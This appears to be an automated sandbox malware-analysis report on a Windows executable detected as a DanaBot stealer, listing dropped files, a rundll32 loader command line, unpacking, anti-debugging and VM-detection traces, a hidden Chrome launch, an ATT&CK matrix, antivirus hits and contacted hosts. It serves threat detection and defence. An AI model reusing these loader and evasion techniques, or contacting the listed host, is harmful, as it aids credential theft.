Classification label: mal100.troj.evad.winEXE@44/4@4/6

Source: C:\Users\user\Desktop\9nSv9py6hs.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\9nSv9py6hs.exe

Code function: 0_2_006130E2 CreateToolhelp32Snapshot,

0_2_006130E2

Source: C:\Users\user\Desktop\9nSv9py6hs.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Udtshesidi.tmp",Wpfprp

Source: C:\Windows\System32\notepad.exe

Mutant created: \Sessions\1\BaseNamedObjects\{9071606A-45EB-439E-9BC8-BE509B90F3A0}

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\9nSv9py6hs.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 9nSv9py6hs.exe

Static file information: File size 2440192 > 1048576

Source: 9nSv9py6hs.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x230c00

Source: 9nSv9py6hs.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\vaxerin_46\salipe zojexuvudiyoro-yaweliwug10.pdbP source: 9nSv9py6hs.exe
Source:	Binary string: C:\saza\24_gihihuw\mirohulikusi_fo.pdb source: 9nSv9py6hs.exe, 00000000.00000002.275612024.0000000005CF0000.00000004.00001000.00020000.00000000.sdmp, 9NSV9PY6HS.exe, 00000001.00000000.268507480.0000000000401000.00000020.00000001.01000000.00000004.sdmp, 9NSV9PY6HS.exe.0.dr
Source:	Binary string: C:\vaxerin_46\salipe zojexuvudiyoro-yaweliwug10.pdb source: 9nSv9py6hs.exe
Source:	Binary string: C:\saza\24_gihihuw\mirohulikusi_fo.pdbp source: 9nSv9py6hs.exe, 00000000.00000002.275612024.0000000005CF0000.00000004.00001000.00020000.00000000.sdmp, 9NSV9PY6HS.exe, 00000001.00000000.268507480.0000000000401000.00000020.00000001.01000000.00000004.sdmp, 9NSV9PY6HS.exe.0.dr

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\9nSv9py6hs.exe

Unpacked PE file: 0.2.9nSv9py6hs.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Unpacked PE file: 0.2.9nSv9py6hs.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Unpacked PE file: 1.2.9NSV9PY6HS.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_006530B4 push 00632813h; ret	0_2_00653467
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_0062E09B push 0062C949h; ret	0_2_0062E24E
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_0062F128 push 0062C949h; ret	0_2_0062F33B
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005FE33C push 005FB973h; ret	0_2_005FE5AC
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005FE33C push dword ptr [00658CF1h]; ret	0_2_005FEB23
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_00608383 push 005B505Eh; ret	0_2_0060889E
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005F83B6 push 005B48A9h; ret	0_2_005F864F
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_00650646 push 0061E296h; ret	0_2_00650702
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_00650703 push 0064F3FDh; ret	0_2_0065099F
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005FF89B push 005F779Bh; ret	0_2_005FF93C
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_0062EC7C push dword ptr [00659795h]; ret	0_2_0062EF4D
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_0062FD28 push 005F50A2h; ret	0_2_0062FF27
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_0062FD28 push 00611B1Fh; ret	0_2_006303C3
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005FDD8A push 005F98E9h; ret	0_2_005FDECF
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_00646F40 push 0062D65Fh; ret	0_2_00647016
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005C805E push 005B26E5h; ret	0_2_005C8141
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005E505A push 005B505Eh; ret	0_2_005E50E5
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005E2058 push dword ptr [00658825h]; ret	0_2_005E21C6
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_0064E06C push 0064F3FDh; ret	0_2_0064E416
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_00603069 push 005F98E9h; ret	0_2_00603088
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005D7057 push dword ptr [00658825h]; ret	0_2_005D70F3
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005C9057 push 005B32BAh; ret	0_2_005C9303
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_00649069 push 006018E1h; ret	0_2_0064908E
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005F004E push dword ptr [00658825h]; ret	0_2_005F011D
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005FC04E push 005F8B12h; ret	0_2_005FC06E
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_00604074 push 00602235h; ret	0_2_0060407E
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_00615074 push 0060A869h; ret	0_2_0061508B
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_0064A044 push 0063C853h; ret	0_2_0064A0E6
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_00631045 push 00611A49h; ret	0_2_006310A8
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005BC073 push 005B1BC0h; ret	0_2_005BC147
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Code function: 0_2_005E7077 push 005B1BC0h; ret	0_2_005E7089

Source: C:\Windows\System32\notepad.exe	File created: tmp0CBB.tmp (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	File created: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\9nSv9py6hs.exe	File created: C:\Users\user\AppData\Local\Temp\Udtshesidi.tmp	Jump to dropped file

Source: C:\Users\user\Desktop\9nSv9py6hs.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe TID: 3680	Thread sleep time: -213000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3680	Thread sleep time: -1027000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3680	Thread sleep time: -544000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe

Code function: 1_2_00406944 rdtsc

1_2_00406944

Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 136000			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Thread delayed: delay time: 40000			Jump to behavior

Source: 9nSv9py6hs.exe, 00000000.00000002.270866356.0000000003150000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}H
Source: 9nSv9py6hs.exe, 00000000.00000002.270866356.0000000003150000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\System32\notepad.exe

Thread information set: HideFromDebugger

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe

Code function: 1_2_00406944 rdtsc

1_2_00406944

Source: C:\Windows\System32\notepad.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_004069D4 mov eax, dword ptr fs:[00000030h]		1_2_004069D4
Source: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	Code function: 1_2_049C70A3 push dword ptr fs:[00000030h]		1_2_049C70A3

Source: C:\Windows\System32\notepad.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe chrome.exe" --no-first-run --no-default-browser-check --noerrdialogs --disable-crash-reporter --disable-backgrounding-occluded-windows --disable-background-timer-throttling --disable-extensions-http-throttling --disable-renderer-backgrounding --disable-audio-output --silent-launch --restore-last-session --elevated --profile-directory="default
Source: C:\Windows\System32\notepad.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe chrome.exe" --no-first-run --no-default-browser-check --noerrdialogs --disable-crash-reporter --disable-backgrounding-occluded-windows --disable-background-timer-throttling --disable-extensions-http-throttling --disable-renderer-backgrounding --disable-audio-output --silent-launch --restore-last-session --elevated --profile-directory="default			Jump to behavior

Source: C:\Users\user\Desktop\9nSv9py6hs.exe

Process created: C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe "C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe"

Jump to behavior

Source: C:\Users\user\Desktop\9nSv9py6hs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\9nSv9py6hs.exe

Code function: 0_2_006026AD GetLocalTime,

0_2_006026AD

Source: 9nSv9py6hs.exe

Binary or memory string: MSASCui.exe

Stealing of Sensitive Information

Yara detected DanaBot stealer dll

Source: Yara match	File source: 0.2.9nSv9py6hs.exe.4e00e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.9nSv9py6hs.exe.5070000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.274015808.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.266020343.0000000005070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected DanaBot stealer dll

Source: Yara match	File source: 0.2.9nSv9py6hs.exe.4e00e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.9nSv9py6hs.exe.5070000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.274015808.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.266020343.0000000005070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Command and Scripting Interpreter	Path Interception	11 Process Injection	111 Virtualization/Sandbox Evasion	1 Input Capture	1 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	21 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	11 Process Injection	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	111 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Rundll32	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	4 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	21 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	3 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
9nSv9py6hs.exe	51%	ReversingLabs	Win32.Trojan.Generic
9nSv9py6hs.exe	37%	Virustotal		Browse
9nSv9py6hs.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\9NSV9PY6HS.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Udtshesidi.tmp	58%	ReversingLabs	Win32.Trojan.DanaBot

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.3.9nSv9py6hs.exe.5070000.0.unpack	100%	Avira	HEUR/AGEN.1215478	Download File
0.2.9nSv9py6hs.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen2	Download File
1.2.9NSV9PY6HS.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
0.2.9nSv9py6hs.exe.4e00e67.1.unpack	100%	Avira	HEUR/AGEN.1215478	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://anglebug.com/4633	0%	URL Reputation	safe
https://crbug.com/368855.)	0%	URL Reputation	safe
https://crbug.com/368855.)	0%	URL Reputation	safe
http://polymer.github.io/AUTHORS.txt	0%	URL Reputation	safe
http://polymer.github.io/AUTHORS.txt	0%	URL Reputation	safe
http://anglebug.com/5281	0%	URL Reputation	safe
http://anglebug.com/5281	0%	URL Reputation	safe
http://polymer.github.io/PATENTS.txt	0%	URL Reputation	safe
http://anglebug.com/3078	0%	URL Reputation	safe
http://anglebug.com/5375	0%	URL Reputation	safe
http://anglebug.com/3502	0%	URL Reputation	safe
http://anglebug.com/3623	0%	URL Reputation	safe
http://anglebug.com/3625	0%	URL Reputation	safe
http://anglebug.com/3624	0%	URL Reputation	safe
http://anglebug.com/5007	0%	URL Reputation	safe
http://anglebug.com/4836	0%	URL Reputation	safe
http://anglebug.com/4384	0%	URL Reputation	safe
http://anglebug.com/3970	0%	URL Reputation	safe
http://polymer.github.io/CONTRIBUTORS.txt	0%	URL Reputation	safe
http://anglebug.com/2517	0%	URL Reputation	safe
http://anglebug.com/4937	0%	URL Reputation	safe
http://anglebug.com/3153	0%	URL Reputation	safe
http://anglebug.com/6929	0%	Avira URL Cloud	safe
https://anglebug.com/7246	0%	Avira URL Cloud	safe
http://crbug.com/1165751	0%	Avira URL Cloud	safe
http://anglebug.com/6248	0%	Avira URL Cloud	safe
https://csp.withgoogle.com/csp/gws/cdt1rj	0%	Avira URL Cloud	safe
http://anglebug.com/5371	0%	Avira URL Cloud	safe
http://anglebug.com/4722	0%	Avira URL Cloud	safe
http://anglebug.com/6692	0%	Avira URL Cloud	safe
https://grtrackingstorage.com/	0%	Avira URL Cloud	safe
http://anglebug.com/5901	0%	Avira URL Cloud	safe
http://anglebug.com/6439	0%	Avira URL Cloud	safe
http://anglebug.com/5906	0%	Avira URL Cloud	safe
http://anglebug.com/7406	0%	Avira URL Cloud	safe
http://anglebug.com/3965	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
accounts.google.com	142.250.180.173	true	false	high
grtrackingstorage.com	95.141.32.211	true	false	unknown
www.google.com	142.251.209.36	true	false	high
clients.l.google.com	142.250.184.46	true	false	high
clients2.google.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://grtrackingstorage.com/	false	Avira URL Cloud: safe	unknown
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://mail.google.com/mail/?usp=installed_webapp	chrome.exe, 0000000D.00000003.311139526.000033E0005E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/?p=settings_sync_error	chrome.exe, 0000000D.00000003.327954315.000033E00140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327909466.000033E001590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.329833961.000033E0016AC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lens.google.com/b	chrome.exe, 0000000D.00000003.307093561.0000391A00330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.318241007.0000391A00708000.00000004.00000800.00020000.00000000.sdmp	false		high
https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b	chrome.exe, 0000000D.00000003.341605187.000033E0005C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone	chrome.exe, 0000000D.00000003.313262848.000033E000964000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4633	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/settings/chrome/sync?hl=en-US	chrome.exe, 0000000D.00000003.329833961.000033E0016AC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/B	chrome.exe, 0000000D.00000003.311139526.000033E0005E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://crbug.com/368855.)	chrome.exe, 0000000D.00000003.315871574.000033E000D78000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://polymer.github.io/AUTHORS.txt	chrome.exe, 0000000D.00000003.330039755.000033E001744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.341792635.000033E001124000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.328358661.000033E000834000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327954315.000033E00140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327996253.000033E0015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327198093.000033E001520000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.331113001.000033E00160C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.341569795.000033E001714000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.328294400.000033E000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327824904.000033E0015B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327198093.000033E0015B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.341701466.000033E000834000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327885098.000033E001460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.341486037.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327772115.000033E000964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327198093.000033E001590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327696668.000033E000E38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.328181687.000033E001464000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.328106665.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.326821565.000033E001520000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.331248964.000033E001750000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://docs.google.com/	chrome.exe, 0000000D.00000003.310772058.000033E00029C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/:	chrome.exe, 0000000D.00000003.311139526.000033E0005E0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crbug.com/1165751	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://photos.google.com?referrer=CHROME_NTP	chrome.exe, 0000000D.00000003.341792635.000033E001124000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.341701466.000033E000834000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/tips/	chrome.exe, 0000000D.00000003.404771517.000033E000964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.352029882.000033E000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.313262848.000033E000964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.340807899.000033E000964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327772115.000033E000974000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/?lfhs=2	chrome.exe, 0000000D.00000003.311139526.000033E0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.429961698.000033E0007CC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6248	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/6929	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.google.com/chrome?p=update_error	chrome.exe, 0000000D.00000003.316432223.000033E000558000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327198093.000033E001520000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.341486037.000033E000558000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327198093.000033E0014E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.326821565.000033E0014CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.326821565.000033E001520000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.328106665.000033E000558000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.326797142.000033E0011D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.326280772.000033E000558000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/accounts/OAuthLogin?issueuberauth=1	chrome.exe, 0000000D.00000003.402596542.000033E00140C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5281	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://www.youtube.com/?feature=ytca	chrome.exe, 0000000D.00000003.311139526.000033E0005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.429961698.000033E0007CC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome?p=syncgoogleservices	chrome.exe, 0000000D.00000003.326821565.000033E001520000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.329833961.000033E0016AC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://accounts.google.com/OAuthLogin	chrome.exe, 0000000D.00000003.324562440.000033E000124000.00000004.00000800.00020000.00000000.sdmp	false		high
https://csp.withgoogle.com/csp/gws/cdt1rj	chrome.exe, 0000000D.00000003.405040031.000033E0001C5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327102547.000033E0001C5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.326637981.000033E0001C5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.google.com/document/u/0/create?usp=chrome_actions	chrome.exe, 0000000D.00000003.313262848.000033E000964000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p	chrome.exe, 0000000D.00000003.402462948.000033E00160C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.402596542.000033E00140C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7246	chrome.exe, 0000000D.00000003.311106358.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.google.com/presentation/	chrome.exe, 0000000D.00000003.311139526.000033E0005E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore	chrome.exe, 0000000D.00000003.346913562.000033E000908000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pay.google.com/payments/home?utm_source=chrome&utm_medium=settings&utm_campaign=payment-meth	chrome.exe, 0000000D.00000003.329833961.000033E0016AC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/PATENTS.txt	chrome.exe, 0000000D.00000003.330039755.000033E001744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.341792635.000033E001124000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.328358661.000033E000834000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327954315.000033E00140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327996253.000033E0015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327198093.000033E001520000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.331113001.000033E00160C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.341569795.000033E001714000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.328294400.000033E000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327824904.000033E0015B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327198093.000033E0015B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.341701466.000033E000834000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327885098.000033E001460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.341486037.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327772115.000033E000964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327198093.000033E001590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.327696668.000033E000E38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.328181687.000033E001464000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.328106665.000033E00054C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.326821565.000033E001520000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.331248964.000033E001750000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://payments.google.com/payments/v4/js/integrator.js	chrome.exe, 0000000D.00000003.402596542.000033E00140C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en3	chrome.exe, 0000000D.00000003.310978057.000033E0005C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/161903006	chrome.exe, 0000000D.00000003.310908896.000033E000540000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com/	chrome.exe, 0000000D.00000003.311139526.000033E0005E0000.00000004.00000800.00020000.00000000.sdmp	false		high
